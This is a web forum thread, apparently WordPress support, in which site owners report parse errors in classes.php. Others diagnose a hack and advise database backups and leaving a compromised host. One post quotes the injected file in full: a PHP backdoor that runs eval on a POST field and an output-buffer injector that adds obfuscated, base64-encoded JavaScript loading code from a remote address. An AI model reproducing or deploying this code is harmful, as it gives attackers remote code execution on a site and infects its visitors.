Parse error: syntax error, unexpected … on line 807

hsphere/local/home/ronybig0/religiontranscends.com/wp-includes/classes.php on line 807

whats on lines 800-810 of that file?

Here’s lines 800-811 – FYI I’m new to this… Don’t talk BIG!

$this->responses[] = $x;
		return $x;
	}

	function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'?><?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIApldmFsKHVuZXNjYXBlKCclMkZgJTJGJCUyRSUyRSUyRSQAJTNDI2QmJTY5JTc2JCUyMCFzdCU3OSMlNkN8ZT0mJTY0fiU2OSU3M3AkJTZDQGF5YCUzQSU2RUBvQCU2RWAlNjUlM0UkXG58ZCU2RkAlNjNAJTc1YG0lNjUmbnR8JTJFISU3N2AlNzJpdCElNjUhJTI4ISImJTNDJTJGdCElNjUlNzhAdGElNzJlIWElM0UiKUA7I3YhJTYxciYlMjAkJTY5fiUyQ18sQCU2MSUzRHwlNUIiMiExOC45JTMzfi4lMzIjMCUzMiYuITYhJTMxIyUyMn4sfCUyMiMlMzclMzgjJTJFMSMlMzFgMC5gMTclMzUhLiUzMiElMzEkJTIyfl1gO19APWAlMzEkJTNCJTY5YCU2NiYlMjhAJTY0byQlNjMlNzUlNkR+ZXwlNkUlNzQlMkUlNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3NCYlM0VpJTY2JihgJTVGYCUyOSU2NG8lNjMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><wp_ajax>";
		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();

your site is hacked.

you have a lot of content on that blog. be very careful with how you proceed.

Do an immediate backup of your database.

I dont know what version youre running — it would be helpful to know that, so I can give you some specific advice.

In the meantime, you can look through some of the other threads Ive replied to to get some general advice.

https://www.ads-software.com/search/hacked?forums=1

to get your backup — login to your hosts control panel.

Heres what the page will look like after you login (thats your own hosts DEMO page):

https://cp6.ixwebhosting.com/psoft/servlet/psoft.hsphere.CP/demolinux/1273400_0/demolin_test888

scroll down that page, and you will see phpmyadmin and an icon.

click that icon..

find your wordpress database, and click the icon on the far right of the page.

that opens phpmyadmin.

From there, follow this:

https://codex.www.ads-software.com/Backing_Up_Your_Database

—–

I provided the demo above for instructional purposes only. You need to login at the top of this page to actually “do” all this for real:

https://www.ixwebhosting.com/index.php/v2/pages.dspmain

just a warning to people with IXwebhosting, just about everyone is getting hacked who has a wordpress blog or other type of PHP-based web platform. they have a horrible security problem and sites are getting reinfected from other hosting accounts on shared servers.

so, even if you get yours cleaned out, it will likely come back. you should leave IXwebhosting as soon as you can.

you should leave IXwebhosting as soon as you can.

I agree, and made mention of both the widespread hacking and my opinion re: changing hosts, in related thread.

They (IXwebhosting) were actually rooted, and it sounds like they didnt take care of that properly.

This is GREAT! (sarcasm)

Do you have a recommendation of a alternate host you like???

I too have been plagued by IXWebhosting. I’ve been hacked twice now and they aren’t helping one bit. They recently emailed me this on 12/16

We are happy to inform you that we are about to upgrade PHP to the latest version (4.4.9) on the webserver your website is currently being hosted on. This upgrade helps resolve many security exploits which were brought to our attention. With this upgrade we migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. At this time you may now upload your very own php.ini file into your cgi-bin folder.

However, I’m still getting the same error as this topic.

(at least) 7 months ago IX Web Hosting’s servers were seeded by Hacker(s) and now an iFrame Sql injection script is injected into every file on the corrupted servers.
For more than 7 months IX has been lieing and deceiving customers.

You can read all about IX and the lies at

https://ixwebhostwarning.wordpress.com

My advice to anyone using IX, is to count your loss, and move on as soon as possible,things will get a lot worse, before they get better ( if ever)

Okay, I just redid everything from the ground up. I deleted and then re-added my domain. Then installed the wordpress version 2.6.2. Then imported my database and theme. Everything worked fine. Now 3-4 days later out of nowwhere I get this error.

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572

Is this still an ixwebhosting thing? Was a hacked again because of ixwebhosting? Or is their php version still old and not upgraded and it’s their fault again? (Heard something about that)

If it’s them again please let me know of a hosting company you trust for hosting.

Hello,
I had the exact same error as the first post with a nearly identical line 807. I’m new to this, but in reading the replies, it sounds like I was hacked, but I have questions.

For background:
* I have two WordPress blogs on godaddy’s deluxe hosting that have been running fine with no errors.
* I added the All in one SEO Pack and Google Analyticator plug-ins and the next day the sites were down with this error.
* This file along with most all of the others were updated at the within a few minutes of each other.
* Everything is backed up daily so the first time this happened, I restored it to the previous days files and it was fine and changed all passwords just to make sure.
* Everything was fine for a day and half and it happened again – same parse error, same that most all files were modified at about same time. I repeated the same process to get sites back online, but would like to find root of issue.

Godaddy said it could not be anything on their end. Any chance there is some type of automatic update with a plug-in or something that may be changing all the files?

Thanks.

Hi,

I am getting same error on 1 of my client sites…

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /hsphere/localblah blahblah/wp-includes/classes.php on line 1572

Can someone from www.ads-software.com please confirm if this is a HACKED situation ?

Thanks

Hello again,

In looking into this further, I noticed a lot of code (similar to that shown above in other post) was added to this classes.php file and many others files on the site, all witin a few minutes.

So, I removed the plugins and the sites were doing ok (files did not update so the sites did not go down for a couple days), so I added the SEO Pack back and it’s still doing ok. I haven’t added Analyticator back yet. I’m hoping the sites stay up but am still very curious as to what this was so I can prevent it from happening again.

to theblogdoctor, anything sound familiar in our cases? Just trying to figure what could be causing it.

thanks.

Okay, so something is taking down a number of my sites, I am getting this message below on all of them. Am I hacked?

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /public_html/hispy/wp-includes/classes.php on line 807

What do I do about this after I did a backup, I got the error again.